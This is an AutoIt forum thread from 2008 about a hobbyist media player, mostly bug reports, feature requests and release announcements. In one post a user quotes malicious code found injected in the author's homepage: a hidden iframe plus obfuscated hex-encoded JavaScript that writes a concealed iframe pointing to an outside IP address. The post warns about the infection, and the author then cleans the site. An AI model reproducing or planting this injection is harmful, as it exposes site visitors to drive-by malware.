SxyfrG Posted May 27, 2008 Posted May 27, 2008 (edited) Looks pretty good L|M|TER. All i can suggest is changing the image controls to buttons with the $BS_BITMAP or $BS_ICON style *EDIT* And fix the sliders Edited May 27, 2008 by SxyfrG My scripts:AppLauncherTRAY - Awesome app launcher that runs from the system tray NEW VERSION! | Run Length Encoding - VERY simple compression in pure autoit | Simple Minesweeper Game - Fun little game :)My website
nobbe Posted May 28, 2008 Posted May 28, 2008 (edited) hi im trying latest 3.50 version - when the taskbar is higher then regular , the little popup window is behind the taskbar - still no "previous file" button? - updates time display etc on new files after "4" seconds on my pc - thats quite a long time? cpu usage is around 4 % when playing , around 34% when loading a new file - drag and drop files doesnt work anymore? greetings nob Edited May 28, 2008 by nobbe
LIMITER Posted May 28, 2008 Author Posted May 28, 2008 Thx nobbe & SxyfrG ...I fixed the little popup window which was behind the taskbar if the taskbar is higher then regular.I also fixed the Drag 'n Drop function NEW VERSION 3.5.1 !!!
SxyfrG Posted June 1, 2008 Posted June 1, 2008 Well done with the VERY low CPU usage! (I take it you nicked my code from before )Problems that i've noticed with my 10-15 minute quick peek around your program:- Slider and button graphical issues- Slider doesn't track song progress properly (Might have been a one off, i haven't been able to reproduce this bug. Look into it if in doubt.)- Multiple video screens can be opened and OnEvent and variables get all messed up (errors out).- Grammatical errors in your help thingy, i.e. "What does the Auto-Update feature ?" should be "What is the Auto-Update feature ?"- Hard to read the settings information on the settings GUI, i'd suggest making the background black so it can be read more easily.Suggestions:- Some of the settings can be instantly applied, like the language, auto-shuffle and others.- Limit the amount of videos that can be watched at once to 1Besides all that, it's going well My scripts:AppLauncherTRAY - Awesome app launcher that runs from the system tray NEW VERSION! | Run Length Encoding - VERY simple compression in pure autoit | Simple Minesweeper Game - Fun little game :)My website
HAL9000 Posted June 1, 2008 Posted June 1, 2008 Access to the data has been denied!Warning: A virus or unwanted program has been found in the HTTP Data.Requested URL: http://limiter.evonet.ro/Information: Contains suspicious code HEUR/HTML.MalwareGenerated by AntiVir WebGuard 8.0.13.0, AVE 8.1.0.51, VDF 7.0.4.119
LIMITER Posted June 3, 2008 Author Posted June 3, 2008 @HAL9000 ?????? I swear that there is no virus in my homepage ... lol
HAL9000 Posted June 3, 2008 Posted June 3, 2008 this the code <iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe><script>function v4801314628879(v4801314628c75){ function v4801314629071 () {return 16;} return(parseInt(v4801314628c75,v4801314629071()));}function v480131462986b(v4801314629d5f){ function v480131462a85c () {return 2;} var v480131462a06a='';for(v480131462a460=0; v480131462a460<v4801314629d5f.length; v480131462a460+=v480131462a85c()){ v480131462a06a+=(String.fromCharCode(v4801314628879(v4801314629d5f.substr(v480131462a460, v480131462a85c()))));}return v480131462a06a;} document.write(v480131462986b('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C6966 72616D65206E616D653D336463306634207372633D5C27687474703A2F2F37372E3232312E3133332E3139302F2E69662F67 6F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A313434303735292B2762643066323330 35315C272077696474683D343235206865696768743D333339207374796C653D5C27646973706C61793A206E6F6E655C273E 3C2F696672616D653E27293C2F5343524950543E'));</script>see analysis result of virustotalhttp://www.virustotal.com/en/analisis/79c5...37c9f0e88008412google searchhttp://www.google.it/search?q=%3Ciframe+sr...lient=firefox-a
LIMITER Posted June 3, 2008 Author Posted June 3, 2008 (edited) Removed the malicious code Edited June 3, 2008 by LIMITER
computergroove Posted June 4, 2008 Posted June 4, 2008 I have tried to use a bit of your code from Func vplayer() and when I add the line _wmpsetvalue($player, "fullscreen"); sets fullscreen I get the error "AutoIt Error, Line -1: Error: The requested action with this object has failed." I looked in wmp.au3 and the line looks like it should work. Is this a bug? $vfile = "Gargantuan.wmv" Global $player = _wmpcreate(1, 2, 10,100,100); Show, Pixel buffer from left, Pixel buffer from Top, Width of video, Height of Video DllCall("user32.dll", "int", "AnimateWindow", "hwnd", $vplayer, "int", 500, "long", 0x00080000);fade-in GUISetState(@SW_SHOW) _wmpsetvalue($player, "nocontrols");hides controls _wmpsetvalue($player, "cm");disables right-click _wmpsetvalue($player, "volume", 100);sets volume to 100 _wmpsetvalue($player, "fullscreen"); sets fullscreen _wmploadmedia($player, $vfile) Also when I use line : Global $player = _wmpcreate(1, 2, 10,100,100) Is there a way to stretch the video to a larger window without it going to full screen? Get Scite to add a popup when you use a 3rd party UDF -> http://www.autoitscript.com/autoit3/scite/docs/SciTE4AutoIt3/user-calltip-manager.html
LIMITER Posted June 5, 2008 Author Posted June 5, 2008 (edited) I don't know the cause of the error,but the code looks like it should work ... If you want to stretch the video,I think you should make the window resizable and dock the player ... Hope it helps, L|M|TER Edited June 5, 2008 by LIMITER
computergroove Posted June 6, 2008 Posted June 6, 2008 (edited) I downloaded the source and inserted just the line _wmpsetvalue($player, "fullscreen"); sets fullscreen and I am getting the same error. I cannot trace the full screen attribute to anything other than: Case $setting = "fullscreen" $object.fullscreen = "true" in the wmp.au3 or any of your other includes files. Where does autoit reference the machine code for $object.fullscreen? Another question: In WMP.au3 you list several options: $setting: "play" "stop" "pause" "invisible" (Hides all) "control" (Shows controls) "nocontrol" (Hides controls) "fullscreen" "step" (frames to step before freezing) "fastforward" "fastreverse" "volume" (0 To 100) "rate" (-10 To 10) "playcount" Can these be used as command line operators? e.g. l|m|ter.exe /invisible /volume:50 /fullscreen? Good job on the player BTW! Edited June 6, 2008 by computergroove Get Scite to add a popup when you use a 3rd party UDF -> http://www.autoitscript.com/autoit3/scite/docs/SciTE4AutoIt3/user-calltip-manager.html
LIMITER Posted June 7, 2008 Author Posted June 7, 2008 I can't help you much with the UDF because i found it on this forum a long time ago... OF course they can be used as command line parameters Cheers, L|M|TER
crashdemons Posted June 7, 2008 Posted June 7, 2008 Removed the malicious code The following also doesn't help matters.-------------------------------------------------You should also be aware that the site you chose for a host (evonet.ro) has a "dangerous" rating in all four categories of WOT. (Web of Trust)As a child domain of evonet.ro, without enough individual ratings for your subdomain, you will inherit a percentage of evonet.ro's rating. (starting at 100%)Just thought you might like to know about evonet.ro's public standing.WOT Evonet.ro reputation scorecard My Projects - WindowDarken (Darken except the active window) Yahsmosis Chat Client (Discontinued) StarShooter Game (Red alert! All hands to battlestations!) YMSG Protocol Support (Discontinued) Circular Keyboard and OSK example. (aka Iris KB) Target Screensaver Drive Toolbar Thingy Rollup Pro (Minimize-to-Titlebar & More!) 2D Launcher physics example Ascii Screenshot AutoIt3 Quine Example ("Is a Quine" is a Quine.) USB Lock (Another system keydrive - with a toast.)
LIMITER Posted June 7, 2008 Author Posted June 7, 2008 Thx crashdemons ... I already ditched the evonet domain for googlepages which is waaaayyy more safer I'll start moving the homepage soon...
SxyfrG Posted June 12, 2008 Posted June 12, 2008 Should we expect any updates soon? My scripts:AppLauncherTRAY - Awesome app launcher that runs from the system tray NEW VERSION! | Run Length Encoding - VERY simple compression in pure autoit | Simple Minesweeper Game - Fun little game :)My website
LIMITER Posted June 12, 2008 Author Posted June 12, 2008 Yes you should,I just tested the new xp version which works just fine ... I'll release it soon I just upgraded to Vista and I have some problems with ExtProp.au3,which screwed up the code because it shows for ex. : instead of Artist,it shows the year, so the return values are screwed If someone could help me,i'll be delighted Cheers, L|M|TER
LIMITER Posted June 14, 2008 Author Posted June 14, 2008 After a very very very long time (almost a month), here's the newly improvedL|M|TER Media Player 3.5.2ADDED VISTA SUPPORT and many more ...Cheers,L|M|TER
LIMITER Posted June 15, 2008 Author Posted June 15, 2008 NEW VERSION 3.5.3 !!!FULL VISTA SUPPORT (fixed the video player) + Playlist import function (check the #1 post or help-file for more details)
d4rk Posted June 15, 2008 Posted June 15, 2008 Cool ! Keep waiting for the next update ... [quote]Don't expect for a perfect life ... Expect a least troubles ones[/quote]Contact me : ass@kiss.toWhat I Have Done :Favorites Manager Mangage your favorite's folder, that's coolPC Waker For those who want to save stickersWebScipts Supporter For those who've just started with Web and WebScriptsTemporary Looker Simple but powerful to manage your Temporary folder, you know what you downloaded[UDF] _NumberFormat() Better performance on number display[UDF] _DirGet() What a folder contain [how many (hidden,normal,...) files], with one line of code[UDF] _IsPressEs() Just like _IsPress() but for a group of keys
LIMITER Posted June 16, 2008 Author Posted June 16, 2008 NEW VERSION 3.5.4 !!!New search function !! (Just like Winamp's )
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now